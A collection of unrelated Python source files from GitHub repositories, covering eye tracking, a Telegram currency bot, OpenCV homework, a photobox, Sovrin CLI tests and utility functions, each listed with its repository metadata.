qformat = QImage.Format_RGB888
out_image = QImage(frame, frame.shape[1], frame.shape[0], frame.strides[0], qformat)
out_image = out_image.rgbSwapped()
gui.face_label.setAlignment(QtCore.Qt.AlignCenter)
gui.face_label.setPixmap(QPixmap.fromImage(out_image))
elif gui.start:
if not end_sig:
if not esc:
gaze_time = int(time.time()) - gaze_time
img_num = img_num + 1
gaze_info = [gui.name, img_num, sectionA, sectionB, sectionC, sectionD, sectionE, sectionF, gaze_time]
end_sig = event.tracking_end(gaze_info)
thread.cancel()
cv2.destroyAllWindows()
gui.Stack.setCurrentWidget(gui.stack3)
gui.currentStack = 3
info = db.select_user_info(gui.name)
gaze_num = 0
for gaze in info:
gaze_num = gaze_num + 1
num = 1
loop = 1000
end_sig = True
if loop == 1000:
img_path = "data/"+gui.name+"_"+str(num)+".png"
print(img_path)
graph = QPixmap(img_path)
graph = graph.scaledToWidth(800)
gui.graph_label.setPixmap(graph)
num = num + 1
if num > gaze_num:
num = 1
loop = 0
loop = loop + 1
if cv2.waitKey(1) == 27:
break
total_gaze = R_top + L_top + C_top + R_bottom + L_bottom + C_bottom
# print("Top Gaze ratio : ", round(R_top/total_gaze, 2), round(L_top/total_gaze,2), round(C_top/total_gaze,2))
# print("Bottom Gaze ratio: ", round(R_bottom/total_gaze,2), round(L_bottom/total_gaze,2), round(C_bottom/total_gaze,2))
cv2.destroyAllWindows() | jinho17/eye_tracking_project | eye_tracking/Eyetracking/Eyetracking0501.py | Eyetracking0501.py | py | 10,223 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "cv2.VideoCapture",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "gaze_tracking.GazeTracking",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "PyQt5.QtWidgets.QApplication",
"line_number": 63,
"usage_type": "call"
},
{
"api_name... |
12454720392 | from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
# Configurações do ChromeDriver
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument('--headless') # Para executar em modo headless (sem janela do navegador)
# Iniciar o ChromeDriver
driver = webdriver.Chrome(ChromeDriverManager().install(), options=chrome_options)
# Acessar o site do Google
driver.get('https://www.google.com.br')
# Fechar o navegador
driver.quit()
| hericmr/OlhoVivo | sms.py | sms.py | py | 481 | python | pt | code | 0 | github-code | 6 | [
{
"api_name": "selenium.webdriver.ChromeOptions",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "selenium.webdriver.Chrome",
"line_number": 9,
"usage_type": "call"
},
{
"api_na... |
19109140061 | from django.shortcuts import render, redirect
from time import strftime
def index(request):
data = {
"date": strftime("%B %d, %Y"), # automatically adds localtime() as parameter
"time": strftime("%I:%M %p")
}
return render(request,'myapp/index.html', data) | klandon94/django_intro | time_display/apps/myapp/views.py | views.py | py | 286 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "time.strftime",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "time.strftime",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "django.shortcuts.render",
"line_number": 10,
"usage_type": "call"
}
] |
71049150269 | from functools import reduce
import time
def add(x, y):
return x + y
# 匿名函数
f = lambda x, y: x + y
# 三元表达式
x, y = 2,3
r = x if x > y else y
# map
list_x = [1, 2, 3, 4]
m = map(lambda x: x*x, list_x)
print(list(m)) # [1, 4, 9, 16]
# map 多个参数
list_y = [2, 3, 4, 5]
m2 = map(lambda x, y: x*x + y , list_x, list_y)
print(list(m2)) # [3, 7, 13, 21]
# reduce 连续计算
r = reduce(lambda x, y: x+y, list_x)
print(r) # 10
r1 = reduce(lambda x, y: x+y, list_x, 10)
print(r) # 20 10为初始值
# filter
list_x = [0, 1, 0, 2, 0, 1]
f = filter(lambda x: True if x==1 else False, list_x) # 把1选出来
print(list(f)) # [1, 1]
# 装饰器(注解)
def print_current_time(func):
def wrapper(*agrs, **kw): # 可变参数
print('func start')
func(*agrs, **kw)
print('func end')
return wrapper
@print_current_time
def pf(name):
print('this is a func ', name)
pf('pf')
| xxg3053/learn-python | lang/high.py | high.py | py | 942 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "functools.reduce",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "functools.reduce",
"line_number": 30,
"usage_type": "call"
}
] |
43347091848 | import tikzplotlib
from tensorboard.data.experimental import ExperimentFromDev
import re
from collections import defaultdict
import matplotlib.pyplot as plt
import numpy as np
import pickle
def group_by_repetition(scalars):
runs = scalars.run.unique()
# each run has name job*_A --> no repetition
# or job*_Arepetition.*C --> repetition id indicated by second star
# job[0-9]+_([a-zA-Z0-9\._\/]*)repetition\.([0-9]+)([a-zA-Z0-9\._\/]*)
# job[0-9]+_([a-zA-Z0-9\._\/]*)
groups = defaultdict(list)
for run in runs:
match_repetition = re.match("[0-9\-\/]*job[0-9]+_([a-zA-Z0-9\._\/\-]*)repetition\.([0-9]+)([a-zA-Z0-9\._\/]*)", run)
match_no_repetition = re.match("[0-9\-\/]*job[0-9]+_([a-zA-Z0-9\._\/]*)", run)
if match_repetition:
A = match_repetition.group(1)
C = match_repetition.group(3)
groups[(A, C)].append(run)
elif match_no_repetition:
A = match_no_repetition.group(1)
groups[A].append(run)
else:
print("job name could not be match with a regex: {} , skipping".format(run))
print("Found {} groups:".format(len(groups)))
for x in groups:
if isinstance(x, tuple):
print("job*_{}repetition.*{}".format(x[0], x[1]))
elif isinstance(x, str):
print("job*_{}".format(x))
print("\n")
renamed_groups = defaultdict(list)
try:
with open("../tmp/default_short_names.pkl", 'rb') as f:
default_names = pickle.load(f)
except FileNotFoundError as e:
default_names = {}
for x in groups:
if x in default_names:
def_name = default_names[x]
suffix = "default = {}".format(def_name)
else:
suffix = ""
if isinstance(x, tuple):
name = input("Please give a short name to job*_{}repetition.*{}\n{}\n".format(x[0], x[1], suffix)) or def_name
elif isinstance(x, str):
name = input("Please give a short name to job*_{}\n{}\n".format(x, suffix)) or def_name
if name != "del":
renamed_groups[name] += groups[x]
default_names[x] = name
with open("../tmp/default_short_names.pkl", 'wb') as f:
pickle.dump(default_names, f)
return renamed_groups
def get_mean_std(data):
all_lengths = sorted([d.step.values[-1] for d in data])
all_starts = sorted([d.step.values[0] for d in data])
max_start = max(all_starts)
min_length = min(all_lengths)
max_length = max(all_lengths)
std_limit = all_lengths[-2]
x = np.arange(max_start, max_length)
data = [np.interp(x[x <= d.step.values[-1]], d.step, d["value"]) for d in data]
sum_arr = np.zeros(max_length - max_start)
count_arr = np.zeros(max_length - max_start, dtype=np.int32)
for d in data:
sum_arr[:len(d)] += d
count_arr[:len(d)] += 1
mean = sum_arr / count_arr
sum_arr = np.zeros(max_length - max_start)
count_arr = np.zeros(max_length - max_start, dtype=np.int32)
for d in data:
sum_arr[:len(d)] += (d - mean[:len(d)]) ** 2
count_arr[:len(d)] += 1
std = np.sqrt(sum_arr / count_arr)
return x, mean, std
def plot_by_tag(fig, scalars, groups, tag, ylim=None):
ax = fig.add_subplot(111)
for name, runs in groups.items(): # for each group
data = [scalars[scalars.run.eq(run) & scalars.tag.eq(tag)] for run in runs]
x, mean, std = get_mean_std(data)
line, = ax.plot(x, mean, label=name)
ax.fill_between(x, mean - std, mean + std, color=line.get_color(), alpha=0.1)
scalar_name = tag.split("/")[-1].replace('_', ' ')
n_repetitions = set(len(runs) for runs in groups.values())
if len(n_repetitions) == 1:
suffix = " ({} repetitions)".format(n_repetitions.pop())
else:
suffix = ""
fig.suptitle(scalar_name + suffix)
ax.legend()
ax.set_xlabel("episodes")
ax.set_ylabel(scalar_name)
if ylim is not None:
ax.set_ylim(ylim)
def aggregate_runs(experiment_id, path):
exp = ExperimentFromDev(experiment_id)
scalars = exp.get_scalars()
groups = group_by_repetition(scalars)
available_groups_string = ""
for i, key in enumerate(groups):
available_groups_string += "{: 2d} \t {}\n".format(i, key)
fig = plt.figure(dpi=300)
done = False
while not done:
which = list(map(int, input("Which groups should be plotted? available are:\n" + available_groups_string).split(',')))
groups_to_plot = {key: value for i, (key, value) in enumerate(groups.items()) if i in which}
for tag, ylim in [
("evaluation_success_rate_percent_wrt_ep", (0, 105)),
("evaluation_success_rate_percent_wrt_tr", (0, 105)),
("exploration_success_rate_percent_wrt_ep", (0, 105)),
("exploration_success_rate_percent_wrt_tr", (0, 105)),
("evaluation_delta_distance_to_goal_wrt_ep", (0, 2.0)),
("evaluation_delta_distance_to_goal_wrt_tr", (0, 2.0)),
("exploration_delta_distance_to_goal_wrt_ep", (0, 2.0)),
("exploration_delta_distance_to_goal_wrt_tr", (0, 2.0)),
("evaluation_time_to_solve_wrt_ep", (0, 25)),
("evaluation_time_to_solve_wrt_tr", (0, 25)),
]:
plot_by_tag(fig, scalars, groups_to_plot, "collection/{}".format(tag), ylim=ylim)
fig.savefig(path + "/{}_{}_{}.png".format(tag, "_".join(map(str, which)), experiment_id))
# tikzplotlib.save(path + "/{}_{}_{}.tex".format(tag, "_".join(map(str, which)), experiment_id))
fig.clf(fig)
done = input("make an other plot? (yes/no)") == "no"
plt.close(fig)
if __name__ == '__main__':
import sys
experiment_id = sys.argv[1]
aggregate_runs(experiment_id, '/tmp')
| charleswilmot/coppelia_sim_inverse_model | src/aggregate_runs.py | aggregate_runs.py | py | 5,903 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "collections.defaultdict",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "re.match",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "re.match",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "collections.defaultdict",
... |
42408411037 | # Телеграмм-бот для конвертации валют: @valuta_course_bot
import telebot
from config import keys, TOKEN
from extensions import APIException, CurrencyConverter
bot = telebot.TeleBot(TOKEN)
@bot.message_handler(commands=['start'])
def function_start(message: telebot.types.Message):
bot.send_message(message.chat.id, f'Добро пожаловать,\t {message.chat.username}!')
bot.send_message(message.chat.id, 'Это бот для конвертации валют.')
bot.send_message(message.chat.id, 'Для начала работы воспользуйтесь подсказками бота /help')
@bot.message_handler(commands=['help'])
def function_help(message: telebot.types.Message):
text = 'Для конвертации введите 3 параметра через пробел:\n' \
'<Ваша валюта>\n<В какую валюту хотите перевести>\n' \
'<Количество переводимой валюты>\n' \
'(пример: рубль евро 1000)\n' \
'Обратите внимание - название валюты пишется\nв именительном падеже единственного числа!\n' \
'Посмотреть список доступных валют: /values'
bot.send_message(message.chat.id, text)
@bot.message_handler(commands=['values'])
def values(message: telebot.types.Message):
text = 'Доступные валюты:'
for key in keys.keys():
text = '\n'.join((text, key))
bot.reply_to(message, text)
@bot.message_handler(content_types=['text'])
def get_price(message: telebot.types.Message):
try:
values = message.text.split(' ')
if len(values) != 3:
raise APIException('Введите три параметра через пробел или\nвоспользуйтесь подсказками бота /help')
val_origin, val_base, amount = values
val_origin = val_origin.lower()
val_base = val_base.lower()
total_base = CurrencyConverter.get_price(val_origin, val_base, amount)
except APIException as e:
bot.reply_to(message, f'Ошибка пользователя.\n{e}')
except Exception as e:
bot.reply_to(message, f'Не удалось обработать команду\n{e}')
else:
text = f'{amount} {val_origin} = {round((total_base * float(amount)), 2)} {val_base}'
bot.send_message(message.chat.id, text)
bot.polling(none_stop=True)
| TamaraRiga/Control-project-18.6 | app.py | app.py | py | 2,545 | python | ru | code | 0 | github-code | 6 | [
{
"api_name": "telebot.TeleBot",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "config.TOKEN",
"line_number": 6,
"usage_type": "argument"
},
{
"api_name": "telebot.types",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "telebot.types",
... |
43974550604 | import re
from collections import defaultdict
from typing import List
class Solution:
def mostCommonWord(self, paragraph: str, banned: List[str]) -> str:
counter = defaultdict() # 딕셔너리 선언
split = re.split('[! ?.,;\']', paragraph) # multiple delimiter
for word in split: # 잘라둔 문자열 순회
if word == '': # 빈 문자열 건너뛰기
continue
word = word.lower() # 소문자로 바꾸고
if word not in banned: # 제외 단어가 아니라면
if word not in counter: # 키 없으면 0으로 세팅해주고
counter[word] = 0
counter[word] += 1 # 값 1 증가
answer = ""
count = 0
for k, v in counter.items(): # 딕셔너리 순회하며
if (v > count): # 카운트가 가장 높은 단어 찾아 반환
count = v
answer = k
return answer | HJ-Rich/leetcode | 819-most-common-word/819-most-common-word.py | 819-most-common-word.py | py | 980 | python | ko | code | 1 | github-code | 6 | [
{
"api_name": "typing.List",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "collections.defaultdict",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "re.split",
"line_number": 9,
"usage_type": "call"
}
] |
40145168774 | #!/usr/bin/env python
from lxml import html
import wikipedia
with open('movies.txt','r') as f:
movies = f.read().strip().split('\n')
m = movies[0]
html = wikipedia.page(m).html()
tree = html.fromstring(html)
director = tree.xpath('//')
| luster/is-pepsi-okay | script/scrape.py | scrape.py | py | 245 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "lxml.html",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "wikipedia.page",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "lxml.html.fromstring",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "lxml.html",
"line_n... |
71802647227 | import pefile
import sys
import os
import json
def locate_data_sections(pe):
data_sections = []
for section in pe.sections:
if section.Name == b'.text\x00\x00\x00':
data_sections.append({
'name': section.Name,
'virtual_address': hex(section.VirtualAddress),
'virtual_size': hex(section.Misc_VirtualSize),
'size': section.SizeOfRawData,
})
return data_sections
directory = sys.argv[1]
output = {}
try:
entries = os.listdir(directory)
for entry in entries:
pe = pefile.PE(os.path.join(directory, entry))
output[entry] = locate_data_sections(pe)
except:
pe = pefile.PE(sys.argv[1])
output[sys.argv[1]] = locate_data_sections(pe)
print(output)
| luiz-cesar/CDadosSeg | T2/Parte2/exe_analysis.py | exe_analysis.py | py | 715 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "sys.argv",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "os.listdir",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "pefile.PE",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": ... |
716738610 | import pytest
import json
from sovrin_client.test.cli.constants import INVALID_SYNTAX
from sovrin_client.test.cli.helper import createUuidIdentifier, addNym
attrib_name = 'dateOfBirth'
ATTRIBUTE_ADDED = 'Attribute added for nym {valid_dest}'
RETURNED_DATA = ['Found attribute', attrib_name, 'dayOfMonth', 'year', 'month']
ATTR_NOT_FOUND = 'Attr not found'
@pytest.fixture(scope="module")
def send_attrib(be, do, poolNodesStarted, trusteeCli):
valid_identifier = createUuidIdentifier()
invalid_identifier = createUuidIdentifier()
addNym(be, do, trusteeCli, idr=valid_identifier)
parameters = {
'attrib_name': attrib_name,
'valid_dest': valid_identifier,
'invalid_dest': invalid_identifier,
'raw': json.dumps({
attrib_name: {
'dayOfMonth': 23,
'year': 1984,
'month': 5
}
})
}
be(trusteeCli)
do('send ATTRIB dest={valid_dest} raw={raw}',
mapper=parameters, expect=ATTRIBUTE_ADDED, within=2)
return parameters
def test_send_get_attr_succeeds_for_existing_uuid_dest(
be, do, poolNodesStarted, trusteeCli, send_attrib):
be(trusteeCli)
do('send GET_ATTR dest={valid_dest} raw={attrib_name}',
mapper=send_attrib, expect=RETURNED_DATA, within=2)
def test_send_get_attr_fails_for_invalid_uuid_dest(
be, do, poolNodesStarted, trusteeCli, send_attrib):
do('send GET_ATTR dest={invalid_dest} raw={attrib_name}',
mapper=send_attrib, expect=ATTR_NOT_FOUND, within=2)
def test_send_get_attr_fails_for_nonexistent_uuid_dest(
be, do, poolNodesStarted, trusteeCli, send_attrib):
with pytest.raises(AssertionError) as excinfo:
do('send GET_ATTR dest=this_is_not_valid raw={attrib_name}',
mapper=send_attrib, expect=ATTR_NOT_FOUND, within=2)
assert(INVALID_SYNTAX in str(excinfo.value))
def test_send_get_attr_fails_for_invalid_attrib(
be, do, poolNodesStarted, trusteeCli, send_attrib):
do('send GET_ATTR dest={valid_dest} raw=badname',
mapper=send_attrib, expect=ATTR_NOT_FOUND, within=2)
def test_send_get_attr_fails_with_missing_dest(
be, do, poolNodesStarted, trusteeCli, send_attrib):
with pytest.raises(AssertionError) as excinfo:
do('send GET_ATTR raw={attrib_name}',
mapper=send_attrib, expect=ATTR_NOT_FOUND, within=2)
assert(INVALID_SYNTAX in str(excinfo.value))
def test_send_get_attr_fails_with_missing_attrib(
be, do, poolNodesStarted, trusteeCli, send_attrib):
with pytest.raises(AssertionError) as excinfo:
do('send GET_ATTR dest={valid_dest}',
mapper=send_attrib, expect=ATTR_NOT_FOUND, within=2)
assert(INVALID_SYNTAX in str(excinfo.value))
| hyperledger-archives/indy-client | sovrin_client/test/cli/test_send_get_attr.py | test_send_get_attr.py | py | 2,791 | python | en | code | 18 | github-code | 6 | [
{
"api_name": "sovrin_client.test.cli.helper.createUuidIdentifier",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "sovrin_client.test.cli.helper.createUuidIdentifier",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "sovrin_client.test.cli.helper.addNym",
... |
28978147496 | import tkinter as tk
import pygubu
import cv2
import copy
import numpy as np
class Application:
def __init__(self, master):
self.master = master
#create builder
self.builder = builder = pygubu.Builder()
#load ui file
builder.add_from_file('hw1.ui')
#create a widget
self.mainwindow = builder.get_object('window', master)
#connect callback
builder.connect_callbacks(self)
def btn_quit_on_click(self):
self.master.quit()
#button for problem 1.1
def btn_11_on_click(self):
#add your code here
img = cv2.imread('dog.bmp')
height, width, channels = img.shape
cv2.imshow('img1.1',img)
print('Height = '+str(height))
print('Width = '+str(width))
cv2.waitKey(0)
#button for problem 1.2
def btn_12_on_click(self):
#add your code here
img = cv2.imread('color.png')
'''img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
cv2.imshow('img1.2',img)'''
for x in range(0,len(img)):
for y in range(0,len(img[x])):
a = img[x][y][0]
b = img[x][y][1]
c = img[x][y][2]
img[x][y][0] = b
img[x][y][1] = c
img[x][y][2] = a
cv2.imshow('img1.2',img)
cv2.waitKey(0)
#button for problem 1.3
def btn_13_on_click(self):
#add your code here
img = cv2.imread('dog.bmp')
height, width, channels = img.shape
new_img = copy.deepcopy(img)
for x in range(height):
for y in range(width):
new_img[x][width-1-y] = img[x][y]
cv2.imshow('img1.3',new_img)
cv2.waitKey(0)
#button for problem 1.4
def btn_14_on_click(self):
def callback(x):
pass
#add your code here
cv2.namedWindow('img1.4')
cv2.createTrackbar('BLEND','img1.4',0,100,callback)
cv2.createTrackbar('OFF','img1.4',0,1,callback)
img = cv2.imread('dog.bmp')
height, width, channels = img.shape
new_img = copy.deepcopy(img)
for x in range(height):
for y in range(width):
new_img[x][width-1-y] = img[x][y]
while(True):
off = cv2.getTrackbarPos('OFF','img1.4')
if(off == 1):
break
blend = cv2.getTrackbarPos('BLEND','img1.4')
blend = blend/100
img_mix = cv2.addWeighted(img, (1-blend), new_img, blend, 0)
cv2.imshow('img1.4',img_mix)
cv2.waitKey(1)
#button for problem 2.1
def btn_21_on_click(self):
#add your code here
img = cv2.imread('eye.jpg')
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
cv2.imshow('gray_img2.1', img)
detect_img = cv2.Canny(img, 150, 300)
cv2.imshow('detect_img2.1', detect_img)
cv2.waitKey(0)
#button for problem 2.2
def btn_22_on_click(self):
#add your code here
img = cv2.imread('eye.jpg')
cimg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
draw_img = np.ones(img.shape, dtype=np.uint8)
# HoughCircles has Canny detector itself
circles = cv2.HoughCircles(cimg, cv2.HOUGH_GRADIENT, 1, 20,param1=300,param2=40,minRadius=10,maxRadius=50)
circles = np.uint16(np.around(circles))
for i in circles[0,:]:
# draw the outer circle
cv2.circle(draw_img,(i[0],i[1]),i[2],(0,0,255),2)
# draw the center of the circle
#cv2.circle(fimg,(i[0],i[1]),2,(0,0,255),3)
# get Canny result to draw (has the same Canny parameter with HoughCircles)
fimg = cv2.Canny(img,150,300)
fimg = cv2.cvtColor(fimg, cv2.COLOR_GRAY2RGB)
# combine draw and Canny result
mix_draw = cv2.addWeighted(draw_img, 1, fimg, 1, 0)
cv2.imshow('detected circles',mix_draw)
cv2.waitKey(0)
#button for problem 2.3
def btn_23_on_click(self):
#add your code here
cv2.waitKey(0)
#button for problem 3
def btn_3_on_click(self):
#add your code here
cv2.waitKey(0)
#button for problem 4.1
def btn_41_on_click(self):
#add your code here
img = cv2.imread('shoes.jpg')
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
cv2.threshold(img, 127, 255, cv2.THRESH_BINARY)
#cv2.imshow('img4.1_1',img)
blur = cv2.GaussianBlur(img,(5,5),0)
#cv2.imshow('img4.1_2',blur)
median = cv2.medianBlur(blur,5)
cv2.imshow('img4.1',median)
cv2.waitKey(0)
#button for problem 4.2
def btn_42_on_click(self):
#add your code here
img = cv2.imread('shoes.jpg')
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
img = cv2.adaptiveThreshold(img,255,cv2.ADAPTIVE_THRESH_MEAN_C,cv2.THRESH_BINARY,11,2)
cv2.imshow('img4.2_local',img)
blur = cv2.GaussianBlur(img,(5,5),0)
cv2.imshow('img4.2_Gussian_smooth',blur)
median = cv2.medianBlur(blur,5)
cv2.imshow('img4.2_median_filter',median)
if __name__ == '__main__':
root = tk.Tk()
app = Application(root)
root.mainloop()
| F74036378/IMAGE_DEAL1 | hw1.py | hw1.py | py | 4,397 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "pygubu.Builder",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "cv2.imread",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "cv2.imshow",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "cv2.waitKey",
"line_number":... |
40333382628 | from loguru import logger
from gpiozero import Button
from fabiotobox.camera import Camera
from fabiotobox.diaporama import Diaporama
from fabiotobox.photohandler import PhotoHandler
from fabiotobox.tumblr import Tumblr
from enum import IntEnum
import pendulum
import time
SCREENSAVER_DELAY = 1
class PhotoFormat(IntEnum):
PHOTOBOX = 0
POLAROID = 1
class Mode(IntEnum):
PHOTOBOX = 0
DIAPORAMA = 1
class Fabiotobox:
def __init__(
self,
camera: Camera,
photo_handler: PhotoHandler,
diaporama: Diaporama,
tumblr: Tumblr,
shoot_button_port: int,
effect_button_port: int = None,
format_button_port: int = None,
event_title: str = "Test",
):
self.shoot_button = Button(shoot_button_port)
if effect_button_port:
self.effect_button = Button(effect_button_port)
if format_button_port:
self.format_button = Button(format_button_port)
self.camera = camera
self.photo_handler = photo_handler
self.diaporama = diaporama
self.tumblr = tumblr
self.photo_format = PhotoFormat.POLAROID
self.event_title = event_title
self.mode = Mode.PHOTOBOX
self.diaporama_countdown = pendulum.now("Europe/Paris")
def run(self):
self.shoot_button.when_held = self.camera.end
self.camera.start_preview()
self.reset_diaporama_countdown()
while True:
if self.is_diaporama_countdown_reached():
self.mode = Mode.DIAPORAMA
if self.mode is Mode.PHOTOBOX:
self.run_photobox()
else:
self.run_diaporama()
def run_photobox(self):
if self.shoot_button.is_pressed:
logger.debug("Button pressed for a photo")
photo = self.shoot_photo()
self.camera.display_image(photo)
time.sleep(3)
self.camera.undisplay_image()
if self.tumblr is not None:
logger.info("Sending {} to tumblr".format(photo))
self.tumblr.post_photo(photo, self.event_title, [])
self.reset_diaporama_countdown()
def run_diaporama(self):
if self.shoot_button.is_pressed:
logger.debug("Button pressed for exiting diaporama")
self.mode = Mode.PHOTOBOX
self.camera.undisplay_image()
self.reset_diaporama_countdown()
time.sleep(1) # prevent event to be catched by photobox too
else:
if self.is_diaporama_countdown_reached():
logger.info("dirs : {}".format(len(self.diaporama.dirs)))
new_picture = self.diaporama.pick_photo()
# Picture can be none : then, just reset countdown
if new_picture is not None:
self.camera.display_image(new_picture)
self.reset_diaporama_countdown()
def shoot_photo(self) -> str:
if self.photo_format == PhotoFormat.POLAROID:
pictures = self.camera.shoot(1)
photo = self.photo_handler.make_polaroid(pictures[0])
else:
pictures = self.camera.shoot(3)
photo = self.photo_handler.make_photostrip(pictures)
return photo
def reset_diaporama_countdown(self):
self.diaporama_countdown = pendulum.now("Europe/Paris").add(
minutes=SCREENSAVER_DELAY
)
def is_diaporama_countdown_reached(self) -> bool:
return self.diaporama_countdown < pendulum.now("Europe/Paris")
| fabiolab/photobox | fabiotobox/fabiotobox.py | fabiotobox.py | py | 3,580 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "enum.IntEnum",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "enum.IntEnum",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "fabiotobox.camera.Camera",
"line_number": 27,
"usage_type": "name"
},
{
"api_name": "fabiotobox.photoha... |
40504216527 | import os
import subprocess
import tempfile
import nbformat
import pytest
IGNORE_NOTEBOOKS: list[str] = [
"12_ResDMD.ipynb",
"12_koopman_mpc.ipynb",
"koopman_mpc.ipynb",
]
def _notebook_run(path):
"""Execute a notebook via nbconvert and collect output. Returns the parsed notebook object
and the execution errors.
Source:
https://blog.thedataincubator.com/2016/06/testing-jupyter-notebooks/
"""
dirname, _ = os.path.split(path)
os.chdir(dirname)
with tempfile.NamedTemporaryFile(suffix=".ipynb") as fout:
args = [
"jupyter",
"nbconvert",
"--to",
"notebook",
"--execute",
"--ExecutePreprocessor.timeout=400",
"--output",
fout.name,
path,
]
subprocess.check_call(args)
fout.seek(0)
nb = nbformat.read(fout, nbformat.current_nbformat)
errors = [
output
for cell in nb.cells
if "outputs" in cell
for output in cell["outputs"]
if output.output_type == "error"
]
return nb, errors
def _find_all_notebooks_to_run():
from datafold import __path__ as datafold_path
assert len(datafold_path) == 1
import pathlib
datafold_path = pathlib.Path(datafold_path[0])
tutorials_path = datafold_path.parent / "tutorials"
assert tutorials_path.is_dir()
example_notebooks = []
for ipynb_filepath in tutorials_path.rglob("*.ipynb"):
if (
".ipynb_checkpoints" not in str(ipynb_filepath)
and ipynb_filepath.name not in IGNORE_NOTEBOOKS
):
assert ipynb_filepath.is_file()
example_notebooks.append(ipynb_filepath)
return example_notebooks
@pytest.mark.parametrize("nb_path", _find_all_notebooks_to_run())
def test_notebooks(nb_path):
_, errors = _notebook_run(nb_path)
assert not errors
| datafold-dev/datafold | tutorials/tests/test_notebooks.py | test_notebooks.py | py | 1,932 | python | en | code | 13 | github-code | 6 | [
{
"api_name": "os.path.split",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "os.chdir",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "tempfile.NamedTemporaryFile",
... |
9064742045 | from utils import readEdgeList, split_between_last_char
import numpy as np
import time
from ResultWritter import ResultWritter
import os
class KTupleFeatureGenerator:
def __init__(self, path, k = 5, sample_times = 100, thread_num = 40):
self.path = path
self.k = k
self.sample_times = sample_times
self.thread_num = thread_num
def generate_k_tuple_feature(self, path):
os.system('./run ' + path + " " + str(self.k) + " " + str(self.sample_times) + " " + str(self.thread_num))
def generate_k_tuple_feature_old(self, path):
for i in range(3, self.k + 1):
os.system('./runold ' + path + " " + str(i) + " " + str(self.sample_times) + " " + str(self.thread_num))
def generateDataFeature(self):
print(self.path)
# self.generate_k_tuple_feature(self.path)
prefix, _ = split_between_last_char(self.path, '.')
# prefix += suffix
print(prefix)
if os.path.exists(prefix):
filenames = os.listdir(prefix)
filenames = [(prefix + "/" + name) for name in filenames]
fileNames = []
for name in filenames:
if name.split('.')[-1] == "edges":
print(name)
self.generate_k_tuple_feature_old(name)
if __name__ == '__main__':
path = "../data/artist_edges.edges"
ktuple = KTupleFeatureGenerator(path = path)
ktuple.generate_k_tuple_feature_old(ktuple.path)
ktuple.generateDataFeature()
| anonydeepgraphlet/DeepGraphlet | src/k_tuple_feature_generator.py | k_tuple_feature_generator.py | py | 1,538 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "os.system",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.system",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "utils.split_between_last_char",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
... |
23731980444 | from collections import abc
from typing import Any, Callable, Dict, List, Optional, Union
def remove_nulls(data: Union[List, Dict],
value_filter: Optional[Callable[[Any], bool]] = None) -> Union[List, Dict]:
""" Given a list or dict, returns an object of the same structure without filtered values.
By default, key-value pairs where the value is 'None' are removed. The `value_filter` param
must be a function which takes values from the provided dict/list structure, and returns a
truthy value if the key-value pair is to be removed, and a falsey value otherwise.
Args:
data (Union[List, Dict]): List or dict containing data
value_filter (Optional[Callable[[Any], bool]], optional): Lambda function to use to filter out values (e.g. "lambda x: x in (None, 'NULL', 'null')"). Defaults to None.
Raises:
TypeError: Raise TypeError if an unsupported data type is encountered
Returns:
Union[List, Dict]: Returns a filtered version of the list or dictionary passed to the function call
Taken and modified from https://stackoverflow.com/questions/67806380/recursive-remove-all-keys-that-have-null-as-value
"""
collection_types = (list, tuple) # avoid including 'str' here
mapping_types = (abc.Mapping,)
all_supported_types = (*mapping_types, *collection_types)
if value_filter is None:
value_filter = lambda x: x is None
if isinstance(data, collection_types):
data = [d for d in data if not value_filter(d)] # Remove Nones at root level of list
return [remove_nulls(x, value_filter) if isinstance(x, all_supported_types) else x for x in data]
elif isinstance(data, mapping_types):
clean_val = lambda x: remove_nulls(x, value_filter) if isinstance(x, all_supported_types) else x
return {k: clean_val(v) for k, v in data.items() if not value_filter(v)}
raise TypeError(f"Unsupported type '{type(data)}': {data!r}")
# data = {
